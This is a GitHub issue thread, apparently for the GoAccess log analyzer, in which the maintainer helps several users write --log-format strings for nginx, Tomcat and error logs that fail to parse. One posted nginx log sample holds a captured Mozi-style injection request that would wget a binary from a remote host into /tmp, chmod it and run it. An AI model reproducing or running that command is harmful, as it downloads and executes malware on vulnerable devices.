Token '' doesn't match specifier '%h'

[almirus]

if LOG have leading space, get error Token '' doesn't match specifier '%h'
[SPACE]10.88.241.31 - - [24/Nov/2019:03:34:04 +0300] "GET /" 200 21139 "-" "-"

[allinurl]

You will need to use a custom log format. e.g.,

goaccess access.log --log-format=' %h %^[%d:%t %^] "%m %U" %s %b "%R" "%u"' --date-format=%d/%b/%Y --time-format=%T --http-protocol=no

[librenauta]

hi! same problem, sorry im very new to this , my log is

- [06/Jan/2020:04:53:22 +0100]
 "GET / HTTP/1.1" 200 3658 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0" "-"
- [06/Jan/2020:04:53:22 +0100]
 "GET /css/base.css HTTP/1.1" 200 10887 "https://mesh.copiona.com/" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0" "-"
- [06/Jan/2020:04:53:22 +0100]
 "GET /js/anime.min.js HTTP/1.1" 200 14420 "https://mesh.copiona.com/" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0" "-"
- [06/Jan/2020:04:53:22 +0100]
 "GET /js/demo.js HTTP/1.1" 200 4521 "https://mesh.copiona.com/" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0" "-"
- [06/Jan/2020:04:53:23 +0100]
 "GET /favicon.ico HTTP/1.1" 200 13294 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0" "-"
- [06/Jan/2020:04:53:23 +0100]
 "GET /img/hydra.jpg HTTP/1.1" 200 771227 "https://mesh.copiona.com/css/base.css" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:69.0) Gecko/20100101 Firefox/69.0" "-"
- [06/Jan/2020:04:53:58 +0100]
 "HEAD / HTTP/1.1" 400 0 "-" "Monit/5.20.0" "-"

when type :$ sudo goaccess -f /var/log/nginx/access.log

drop it :

Parsed 1 linesproducing the following errors:

Token '-' doesn't match specifier '%h'

Format Errors - Verify your log/date/time format
any help is welcome <3

[allinurl]

@librenauta GoAccess requires the following fields:

a valid IPv4/6 %h
a valid date %d
the request %r

[librenauta]

thnks, i edit my conf nginx with:
http {
log_format specialLog '$remote_addr forwarded for $http_x_real_ip - $remote_user [$time_local] '
'"$request" $status $body_bytes_sent '
'"$http_referer" "$http_user_agent"';
access_log /var/log/nginx/blog/access.log specialLog;
}

and run with:
Please try this (assuming the client IP is on the first field)

goaccess accesslog --log-format='%h %^[%d:%t %^] "%r" %s %b "%R" "%u" %T %^' --date-format=%d/%b/%Y --time-format=%T

Originally posted by @allinurl in #1546 (comment)

thnks 4 help <3

[allinurl]

@librenauta Please try:

goaccess accesslog --log-format='%h %^[%d:%t %^] "%r" %s %b "%R" "%u" %^' --date-format=%d/%b/%Y --time-format=%T

[librenauta]

it's works, thank u for that support

[allinurl]

Awesome. Closing this. Feel free to reopen it as needed.

[dmk2861995]

Hi Team,

Having the same issue.
could you please look into this and share your insights?

Error:
==13663== GoAccess - Copyright (C) 2009-2020 by Gerardo Orellana
==13663== https://goaccess.io - <hello@goaccess.io>
==13663== Released under the MIT License.
==13663==
==13663== FILE: access.log
==13663== Parsed 10 lines producing the following errors:
==13663==
==13663== Token '2021-07-13T02:00:00+00:00]' doesn't match specifier '%h'
==13663== Token '2021-07-13T02:00:00+00:00]' doesn't match specifier '%h'
==13663== Token '2021-07-13T02:00:00+00:00]' doesn't match specifier '%h'
==13663== Token '2021-07-13T02:00:00+00:00]' doesn't match specifier '%h'
==13663== Token '2021-07-13T02:00:01+00:00]' doesn't match specifier '%h'
==13663== Token '2021-07-13T02:00:00+00:00]' doesn't match specifier '%h'
==13663== Token '2021-07-13T02:00:02+00:00]' doesn't match specifier '%h'
==13663== Token '2021-07-13T02:00:05+00:00]' doesn't match specifier '%h'
==13663== Token '2021-07-13T02:00:01+00:00]' doesn't match specifier '%h'
==13663== Token '2021-07-13T02:00:01+00:00]' doesn't match specifier '%h'
==13663==
==13663== Format Errors - Verify your log/date/time format

Thanks in Advance!

[allinurl]

@dmk2861995 please post a few lines from your access.log. Thanks

[abdul-alim]

Hi Team,
Having the same issue.

Log Sample:

[17/Feb/2022:10:34:56 +0000] - 200 200 - GET https www.dealzone.app "/" [Client 49.204.136.60] [Length 93] [Gzip -] [Sent-to api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4692.99 Safari/537.36" "-"
[17/Feb/2022:10:34:57 +0000] - 200 200 - GET https www.dealzone.app "/" [Client 49.204.136.60] [Length 93] [Gzip -] [Sent-to api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4692.99 Safari/537.36" "-"

Error:

Token '[17/Feb/2022:10:34:33' doesn't match specifier '%h'

[allinurl]

@abdul-alim Sorry for the delay, this should do it:

goaccess access.log --log-format='[%d:%t %^] %^ %s %^ %^ %m %^ %v "%U" [%^ %h] [%^ %b] %^"%u" "%R"' --date-format=%d/%b/%Y --time-format=%T

[skathiresan-hw]

time_local="$time_local" http_method="$request_method" scheme="$scheme" site="$server_name" server="$host" dest_port="$server_port" dest_ip="$server_addr" http_host="$http_host" src="$remote_addr" user="$remote_user" status="$status" bytes_out="$body_bytes_sent" bytes_in="$upstream_response_length" http_referer="$http_referer" http_user_agent="$http_user_agent" nginx_version="$nginx_version" http_x_forwarded_for="$http_x_forwarded_for" uri_path="$uri" response_time="$upstream_response_time" request_time="$request_time" protocol="$server_protocol" $status $body_bytes_sent "$http_referer"   "$http_user_agent" "$http_x_forwarded_for" ua="$upstream_addr" us="$upstream_status"limit_req_status=$limit_req_status

using nginx2goaccess.sh, we get

time-format %T
date-format %d/%b/%Y
log_format time_local="%d:%t %^" http_method="%m" scheme="%^" site="%^" server="%v" dest_port="%^" dest_ip="%^" http_host="%v" src="%h" user="%^" status="%s" bytes_out="%b" bytes_in="%^" http_referer="%R" http_user_agent="%u" nginx_version="%^" http_x_forwarded_for="%^" uri_path="%^" response_time="%^" request_time="%T" protocol="%H" %s %b "%R"   "%u" "%^" ua="%^" us="%^"limit_req_status=%^

but it doesn't work, we keep getting error.

sample access log::

time_local="11/JAN/2022:15:38:20 +0000" http_method="GET" scheme="https" site="*.example.com" server="api.example.com" dest_port="443" dest_ip="1.8.2.53" http_host="api.example.com" src="1.8.2.254" user="monitor" status="200" bytes_out="958" bytes_in="958" http_referer="-" http_user_agent="okhttp/4.8.1" nginx_version="1.21.0" http_x_forwarded_for="1.8.2.254" uri_path="/path/" response_time="0.196" request_time="0.196" protocol="HTTP/1.1"200 958 "-" "okhttp/4.8.1" "199.247.90.248"ua="10.10.20.10" us="200" limit_req_status=PASSED 

Please help @allinurl

[allinurl]

This should do it @skathiresan-hw

goaccess access.log --log-format='%^="%d:%t %^" %^="%m" %^="%^" %^="%^" %^="%v" %^="%^" %^="%^" %^="%^" %^="%h" %^="%e" %^="%s" %^="%b" %^="%^" %^="%R" %^="%u" %^="%^" %^="%^" %^="%U" %^="%T" %^="%^" %^="%H" %^' --date-format=%d/%b/%Y --time-format=%T

[Maxime-Garcia]

Hi @allinurl !
I am having the same issue as the others. I don't really know how goaccess works but when I use this command line : goaccess acces.log.txt and I toggle any of the options I always have an error like that : Token '+0000]' doesn't match specifier '%h'. I really don't know what to do to fix this.
Thanks in advance for your time !

[allinurl]

@Maxime-Garcia sounds like a format issue, please feel free to post a few sample lines from your access.log so I can take a look. Thanks.

[Maxime-Garcia]

Hi again @allinurl ! Thanks for your response and sorry for the delay of mine, here's a sample of my access.log.

thonon-gaming-fest.fr 2a04:cec0:112c:e350:0:a:2575:3201 - - [10/May/2022:14:58:46 +0000] (0 s) "GET /wp-content/plugins/pandemic-core/inc/wp-team-matches/components/tipsy/src/stylesheets/tipsy.css?ver=5.9.3 HTTP/1.1" 200 509 "-" "Mozilla/5.0 (Linux; Android 11; DN2103) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
thonon-gaming-fest.fr 2a04:cec0:112c:e350:0:a:2575:3201 - - [10/May/2022:14:58:46 +0000] (0 s) "GET /wp-content/plugins/pandemic-core/inc/wp-team-matches/css/flags.css?ver=1.01 HTTP/1.1" 200 1803 "-" "Mozilla/5.0 (Linux; Android 11; DN2103) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
thonon-gaming-fest.fr 2a04:cec0:112c:e350:0:a:2575:3201 - - [10/May/2022:14:58:46 +0000] (0 s) "GET /wp-includes/css/dist/block-library/style.min.css?ver=5.9.3 HTTP/1.1" 200 11206 "-" "Mozilla/5.0 (Linux; Android 11; DN2103) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"

Thank you so much for your help !!

[allinurl]

No worries, please try this:

goaccess access.log --log-format='%v %h %^[%d:%t %^] (%T s) "%r" %s %b "%R" "%u"' --date-format=%d/%b/%Y --time-format=%T

[Maxime-Garcia]

Hello @allinurl ! This is working perfectly now ! Thanks a lot for your help !!
Have a great day :) !

[RaginiShankar]

Hi @allinurl I am having the same issue :(

==836== Token '06/May/2022:00:00:00' doesn't match specifier '%h'
==836== Token '06/May/2022:00:00:00' doesn't match specifier '%h'
==836== Token '06/May/2022:00:00:06' doesn't match specifier '%h'

Getting above error for below tomcat log and log pattern in tomcat specified as %t %a %u %m %U %q %s %T %D %I %B

[08/May/2022:00:00:05 +0530] 1.24.16.182 - POST /servlet/loginPage 200 60.005 60005 https-jsse-nio2-0.0.0.0-8061-exec-13 0
[08/May/2022:00:00:05 +0530] 192.8.19.97 - POST /servlet/logoutPage 200 0.031 31 https-jsse-nio2-0.0.0.0-8061-exec-31 0

[allinurl]

@RaginiShankar Please try:

goaccess access.log --log-format='[%d:%t %^] %h %e %m %U %s %T %^ %v %^' --date-format=%d/%b/%Y --time-format=%T

[RaginiShankar]

I am still getting the same error and it has not been resolved.

…

On Thu, May 19, 2022 at 7:56 AM Gerardo O. ***@***.***> wrote: @RaginiShankar <https://github.com/RaginiShankar> Please try: goaccess access.log --log-format='[%d:%t %^] %h %e %m %U %s %T %^ %v %^' --date-format=%d/%b/%Y --time-format=%T — Reply to this email directly, view it on GitHub <#1635 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ACAZLKKJZSXBYXWT2TZ3HRLVKWRF3ANCNFSM4J7DOYTQ> . You are receiving this because you were mentioned.Message ID: ***@***.***>

-- Regards, Ragi

[allinurl]

@RaginiShankar For those two lines you posted, the format I shared works fine. Please upload a sample log directly from your access log. e.g.,

tail -30 access.log > sample.log

[RaginiShankar]

Please find the sample log

…

On Thu, May 19, 2022 at 9:33 PM Gerardo O. ***@***.***> wrote: @RaginiShankar <https://github.com/RaginiShankar> For those two lines you posted, the format I shared works fine. Please *upload* a sample log directly from your access log. e.g., tail -30 access.log > sample.log — Reply to this email directly, view it on GitHub <#1635 (comment)>, or unsubscribe <https://github.com/notifications/unsubscribe-auth/ACAZLKM7LZVRNPLYLM3TSSDVKZQ3NANCNFSM4J7DOYTQ> . You are receiving this because you were mentioned.Message ID: ***@***.***>

-- Regards, Ragi [06/May/2022:00:00:00 +0530] 12.24.138.6 - POST /servlet/testServlet 200 0.029 29 https-jsse-nio2-0.0.0.0-8061-exec-16 0 [06/May/2022:00:00:00 +0530] 12.168.139.97 - POST /servlet/testServlet 200 0.002 2 https-jsse-nio2-0.0.0.0-8061-exec-11 0 [06/May/2022:00:00:06 +0530] 12.168.138.235 - POST /servlet/testServlet 200 0.013 13 https-jsse-nio2-0.0.0.0-8061-exec-11 0 [06/May/2022:00:00:07 +0530] 12.24.138.6 - POST /servlet/testServlet 200 60.004 60004 https-jsse-nio2-0.0.0.0-8061-exec-35 0 [06/May/2022:00:00:10 +0530] 12.24.147.42 - POST /servlet/testServlet 200 0.013 13 https-jsse-nio2-0.0.0.0-8061-exec-10 0 [06/May/2022:00:00:10 +0530] 12.168.139.97 - POST /servlet/testServlet 200 60.002 60002 https-jsse-nio2-0.0.0.0-8061-exec-34 0 [06/May/2022:00:00:10 +0530] 12.24.151.242 - POST /servlet/testServlet 200 0.009 9 https-jsse-nio2-0.0.0.0-8061-exec-2 0 [06/May/2022:00:00:12 +0530] 12.24.144.17 - POST /servlet/testServlet 200 60.002 60002 https-jsse-nio2-0.0.0.0-8061-exec-18 0 [06/May/2022:00:00:13 +0530] 12.24.137.252 - POST /servlet/testServlet 200 0.002 2 https-jsse-nio2-0.0.0.0-8061-exec-31 0 [06/May/2022:00:00:13 +0530] 12.24.137.252 - POST /servlet/testServlet 200 0.001 1 https-jsse-nio2-0.0.0.0-8061-exec-10 0 [06/May/2022:00:00:13 +0530] 12.24.137.252 - POST /servlet/testServlet 200 0.002 2 https-jsse-nio2-0.0.0.0-8061-exec-2 0 [06/May/2022:00:00:13 +0530] 12.24.144.17 - POST /servlet/testServlet 200 0.011 11 https-jsse-nio2-0.0.0.0-8061-exec-34 0

[allinurl]

@RaginiShankar Please attach a file, I don't know if your log is delimited by spaces or tabs, can't really tell based on the spacing I'm seeing. Thanks

[AD-Karthik]

@allinurl - Please help me on the goaccess log-format for the below type nginx log-formats
127.0.0.1 - - [27/Dec/2022:09:01:52 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:02:45 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:03:51 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:08:21 -0500] "\x16\x03\x01\x00\x85\x01\x00\x00\x81\x03\x03\xB6\xA9VaU\xA1\x13|\x05!(\xD2\xBB\xF8\xEF\xD2\xDB\xC5" 400 150 "-" "-"
127.0.0.1 - - [27/Dec/2022:09:11:45 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:15:55 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:16:53 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:16:54 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:17:47 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:18:19 -0500] "GET / HTTP/1.1" 302 138 "-" "Mozilla/5.0 zgrab/0.x"
127.0.0.1 - - [27/Dec/2022:09:18:53 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:26:47 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:30:57 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:31:55 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:31:56 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:32:49 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:33:55 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:41:49 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:45:59 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:46:57 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:46:57 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:47:50 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:48:57 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:56:50 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:09:58:39 -0500] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 150 "-" "-"
127.0.0.1 - - [27/Dec/2022:10:01:00 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:10:01:58 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:10:01:59 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:10:02:52 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"
127.0.0.1 - - [27/Dec/2022:10:03:59 -0500] "GET /v1/encryptedSerial/requestKey HTTP/1.1" 200 50 "-" "Java/1.7.0"

Thanks

[allinurl]

@AD-Karthik Please try

goaccess access.log --log-format=COMBINED

[liuende501]

Thank for your reply! when i use LC_TIME instead of LC_ALL, there is no error, but the report.html is still English.

I already try LC_ALL=zh_CN.UTF-8 goaccess -o report.html --log-format=COMBINED --date-format='%d/%b/%Y' test.log on CentOS, there is no error. But on my computer(MacOS Ventura Version 13.1 (22C65)) show error.

[allinurl]

@liuende501 what's the output of locale -a?

[liuende501]

output of locale

LANG="en_US.UTF-8"
LC_COLLATE="en_US.UTF-8"
LC_CTYPE="en_US.UTF-8"
LC_MESSAGES="en_US.UTF-8"
LC_MONETARY="en_US.UTF-8"
LC_NUMERIC="en_US.UTF-8"
LC_TIME="en_US.UTF-8"
LC_ALL="en_US.UTF-8"

output of locale -a

en_NZ
nl_NL.UTF-8
pt_BR.UTF-8
fr_CH.ISO8859-15
eu_ES.ISO8859-15
en_US.US-ASCII
af_ZA
bg_BG
cs_CZ.UTF-8
fi_FI
zh_CN.UTF-8
eu_ES
sk_SK.ISO8859-2
nl_BE
fr_BE
sk_SK
en_US.UTF-8
en_NZ.ISO8859-1
de_CH
sk_SK.UTF-8
de_DE.UTF-8
am_ET.UTF-8
zh_HK
be_BY.UTF-8
uk_UA
pt_PT.ISO8859-1
en_AU.US-ASCII
kk_KZ.PT154
en_US
nl_BE.ISO8859-15
de_AT.ISO8859-1
hr_HR.ISO8859-2
fr_FR.ISO8859-1
af_ZA.UTF-8
am_ET
fi_FI.ISO8859-1
ro_RO.UTF-8
af_ZA.ISO8859-15
en_NZ.UTF-8
fi_FI.UTF-8
hr_HR.UTF-8
da_DK.UTF-8
ca_ES.ISO8859-1
en_AU.ISO8859-15
ro_RO.ISO8859-2
de_AT.UTF-8
pt_PT.ISO8859-15
sv_SE
fr_CA.ISO8859-1
fr_BE.ISO8859-1
en_US.ISO8859-15
it_CH.ISO8859-1
en_NZ.ISO8859-15
en_AU.UTF-8
de_AT.ISO8859-15
af_ZA.ISO8859-1
hu_HU.UTF-8
et_EE.UTF-8
he_IL.UTF-8
uk_UA.KOI8-U
be_BY
kk_KZ
hu_HU.ISO8859-2
it_CH
pt_BR
ko_KR
it_IT
fr_BE.UTF-8
ru_RU.ISO8859-5
zh_TW
zh_CN.GB2312
no_NO.ISO8859-15
de_DE.ISO8859-15
en_CA
fr_CH.UTF-8
sl_SI.UTF-8
uk_UA.ISO8859-5
pt_PT
hr_HR
cs_CZ
fr_CH
he_IL
zh_CN.GBK
zh_CN.GB18030
fr_CA
pl_PL.UTF-8
ja_JP.SJIS
sr_YU.ISO8859-5
be_BY.CP1251
sr_YU.ISO8859-2
sv_SE.UTF-8
sr_YU.UTF-8
de_CH.UTF-8
sl_SI
pt_PT.UTF-8
ro_RO
en_NZ.US-ASCII
ja_JP
zh_CN
fr_CH.ISO8859-1
ko_KR.eucKR
be_BY.ISO8859-5
nl_NL.ISO8859-15
en_GB.ISO8859-1
en_CA.US-ASCII
is_IS.ISO8859-1
ru_RU.CP866
nl_NL
fr_CA.ISO8859-15
sv_SE.ISO8859-15
hy_AM
en_CA.ISO8859-15
en_US.ISO8859-1
zh_TW.Big5
ca_ES.UTF-8
ru_RU.CP1251
en_GB.UTF-8
en_GB.US-ASCII
ru_RU.UTF-8
eu_ES.UTF-8
es_ES.ISO8859-1
hu_HU
el_GR.ISO8859-7
en_AU
it_CH.UTF-8
en_GB
sl_SI.ISO8859-2
ru_RU.KOI8-R
nl_BE.UTF-8
et_EE
fr_FR.ISO8859-15
cs_CZ.ISO8859-2
lt_LT.UTF-8
pl_PL.ISO8859-2
fr_BE.ISO8859-15
is_IS.UTF-8
tr_TR.ISO8859-9
da_DK.ISO8859-1
lt_LT.ISO8859-4
lt_LT.ISO8859-13
zh_TW.UTF-8
bg_BG.CP1251
el_GR.UTF-8
be_BY.CP1131
da_DK.ISO8859-15
is_IS.ISO8859-15
no_NO.ISO8859-1
nl_NL.ISO8859-1
nl_BE.ISO8859-1
sv_SE.ISO8859-1
pt_BR.ISO8859-1
zh_CN.eucCN
it_IT.UTF-8
en_CA.UTF-8
uk_UA.UTF-8
de_CH.ISO8859-15
de_DE.ISO8859-1
ca_ES
sr_YU
hy_AM.ARMSCII-8
ru_RU
zh_HK.UTF-8
eu_ES.ISO8859-1
is_IS
bg_BG.UTF-8
ja_JP.UTF-8
it_CH.ISO8859-15
fr_FR.UTF-8
ko_KR.UTF-8
et_EE.ISO8859-15
kk_KZ.UTF-8
ca_ES.ISO8859-15
en_IE.UTF-8
es_ES
de_CH.ISO8859-1
en_CA.ISO8859-1
es_ES.ISO8859-15
en_AU.ISO8859-1
el_GR
da_DK
no_NO
it_IT.ISO8859-1
en_IE
zh_HK.Big5HKSCS
hi_IN.ISCII-DEV
ja_JP.eucJP
it_IT.ISO8859-15
pl_PL
ko_KR.CP949
fr_CA.UTF-8
fi_FI.ISO8859-15
en_GB.ISO8859-15
fr_FR
hy_AM.UTF-8
no_NO.UTF-8
es_ES.UTF-8
de_AT
tr_TR.UTF-8
de_DE
lt_LT
tr_TR
C
POSIX

[allinurl]

@liuende501 locale should give you zh_CN.UTF-8. Otherwise it assumes you have a machine with English locale.

[liuende501]

@allinurl i think the reason is that my logfile is not record by `zh_CN.UTF-8. But nginx record log always use English.
i have change locale but still throw error

[allinurl]

@liuende501 now that you have your locale set to zh_CN, go ahead and use LC_TIME to parse an english date. e.g.,

LC_TIME="en_US.UTF-8" bash -c 'goaccess access.log --log-format=COMBINED'

[ansdnrwp]

@ansdnrwp Please try:

goaccess access.log --log-format=COMMON

thank you for the reply. I ran it according to your answer and confirmed that it works normally~!

[liuende501]

@allinurl thank you for you reply. i must set LC_ALL= then it be success

output of terminal

[Kokosnut]

Allinurl, please help me to get the right request, piece of my log:

2023/01/20 02:05:10 [error] 56944#102761: *130796 open() "/usr/home/ac/public_html/wp-content/uploads/2020/05/1588413000_U-Ros-za-dobu-zare-strovano-9623-novih-vipadki-koronav-rusu-pomerli-57-os-b-oduzhali-1793.jpg" failed (2: No such file or directory), client: 129.146.98.232, server: ac.com, request: "GET /wp-content/uploads/2020/05/1588413000_U-Ros-za-dobu-zare-strovano-9623-novih-vipadki-koronav-rusu-pomerli-57-os-b-oduzhali-1793.jpg HTTP/1.1", host: "ac.com"

[allinurl]

@Kokosnut you will need to determine which fields you want to extract. Also, please take a look at this for more info on error log.

[Kokosnut]

@Kokosnut you will need to determine which fields you want to extract. Also, please take a look at this for more info on error log.

i need the following fields:
client
server
request

[Kokosnut]

allinurl can you help me?

[allinurl]

@Kokosnut this should do it (assumes a consistent log):

goaccess error.log --log-format='%d %t %^"%^" %^ (%e) %^: %h, %^: %v, %^: "%r" %^' --date-format=%Y/%m/%d --time-format=%T

[Kokosnut]

How to add IP mapping to this request?

[allinurl]

@Kokosnut not sure I understand what you're after. The IP should already show up with the format I posted.

[Kokosnut]

I mean field - client., screenshot - http://joxi.ru/krD0xgWTGPK46r

[allinurl]

I believe that's the part I'm using for %h on my posted example. However, it looks like the screenshot you posted has a slightly different format that what you posted before.

[Pavithra2320]

Hi Team ,
how do i proceed further with this error ,kindly guide

[RyanZoou]

@allinurl, please help me to get the right request, piece of my log:
09/Jul/2023:23:59:02 -0700|168.25.3.13|POST /api/helloword HTTP/1.1|200|-|168.24.17.24|alertOffline-3613203069_16049472|-|listing-search.p.chime.me|1626|0.062|0.061|127.0.0.1:82|357845629|16|uuid

[allinurl]

@RyanZoou Please describe all those fields. Thanks.

[RyanZoou]

@allinurl Thank so much for your reply, the log fields config:
log_format main '$time_local|$server_addr|$request|$status|$remote_user|$remote_addr|$http_user_agent|$http_referer|$host|$bytes_sent|$request_time|$upstream_response_time|$upstream_addr|$connection|$connection_requests|$uuid';

[thoutamganesh66]

Can someone help me with the log format for my log file
Here are the first few lines of my log file:
"2023-11-07 00:00:08" hello.gb.com 201.144.130.113 GET "/mms/api/sk-applications/df819f8e" "" 200 138
"2023-11-07 00:00:11" hello.gb.com 201.144.130.113 GET "/index.html" "" 200 0
"2023-11-07 00:00:12" hello.gb.com 201.144.130.113 GET "/mms/api/get-current-time" "" 200 1
where the last number(138) is the response time taken by the API

[allinurl]

@thoutamganesh66 This should do it:

goaccess access.log --log-format='"%x" %v %h %m "%U" "%R" %s %b' --datetime-format='%Y-%m-%d %H:%M:%S'

I'm unsure about the purpose of the empty field before the status, marked as "". I included it as the referrer.

[63070016]

Hi I got same problem with error.log I want to goaccess to error.log for nginx

[MrWubbaLubbadubdub]

Hello all,
I'm also facing the similar issue. Requesting all to take a look at my access log and let me know, the correct command to run it.

====Error====
Token '0.248.48.40 - - [10/Dec/2021:15:59:05 +0530' doesn't match specifier '%h'

====Access Logs====
11.11.11.11 - - [10/Dec/2021:15:59:07 +0530] "GET /scripts/formmailto.html HTTP/1.0" 403 199
11.11.11.11 - - [10/Dec/2021:15:59:07 +0530] "GET /scripts/mailtoform.html HTTP/1.0" 403 199
14.14.14.14 - - [10/Dec/2021:15:59:07 +0530] "GET /scripts/form.html HTTP/1.0" 403 199
12.12.12.12 - - [10/Dec/2021:15:59:07 +0530] "GET /formmail/formmail.html HTTP/1.0" 403 199
13.13.13.13 - - [10/Dec/2021:15:59:07 +0530] "GET /formmail/mailform.html HTTP/1.0" 403 199

A quick help would be appreciated @allinurl Thanks in advance.

[allinurl]

@MrWubbaLubbadubdub It appears that you're using the common log format. Please try the following and let me know of the outcome.

# goaccess access.log --log-format=COMMON

[william-0129]

@allinurl
Hello~
I tried using the official explanation as well as the nginx specific time code
I still get the error

My nginx error.log looks like this:

2024/04/03 03:57:15 [error] 15893#15893: *71520311 upstream timed out (110: Connection timed out) while connecting to upstream, client: 1.1.1.1, server: 0.0.0.0:456, upstream: "8.8.8.8:123", bytes from/to client:0/0, bytes from/to upstream:0/0

goaccess error.log --log-format=COMMON
The execution results are as follows

==23681== Token '2024/04/03' doesn't match specifier '%h'
==23681== Format Errors - Verify your log/date/time format

I also tried
goaccess error.log --log-format='"%x" %v %h %m "%U" "%R" %s %b' --datetime-format='%Y-%m-%d % H:%M:%S'
The results are as follows
==23684== Token '024/04/03 03:50:05 [error] 15893#15893: *71516579 upstream timed out (110: Connection timed out) while connecting to upstream, client: 8.8.8.8, server: 0.0 .0.0:123, upstream:' doesn't match specifier '%x'

2 of 2024 is gone

Thank you so much

[allinurl]

@william-0129, please note that goaccess works best with access log data. However, you could try pulling some of the error log data like this:

# goaccess error.log --log-format='%d %t [%e] %^ %^ %U, client: %h, server: %v %^' --date-format=%Y/%m/%d --time-format=%T --http-method=no --http-protocol=no --ignore-panel=REQUESTS_STATIC

The only thing is, it might depend on how the actual error messages are structured/delimited in your logs. But give it a try and let me know how it goes!

[william-0129]

@allinurl
Thank you very much for your help.
So far, I have successfully exported to --real-time-html.
Today, I tried again and it worked.
It is the same as the first time I successfully output with your method, and then converted to --real-time-html.
Only some dashboards don't have values.

[allinurl]

@william-0129 Give the --ignore-panel option a try. For more information on how to use it, refer to the man page.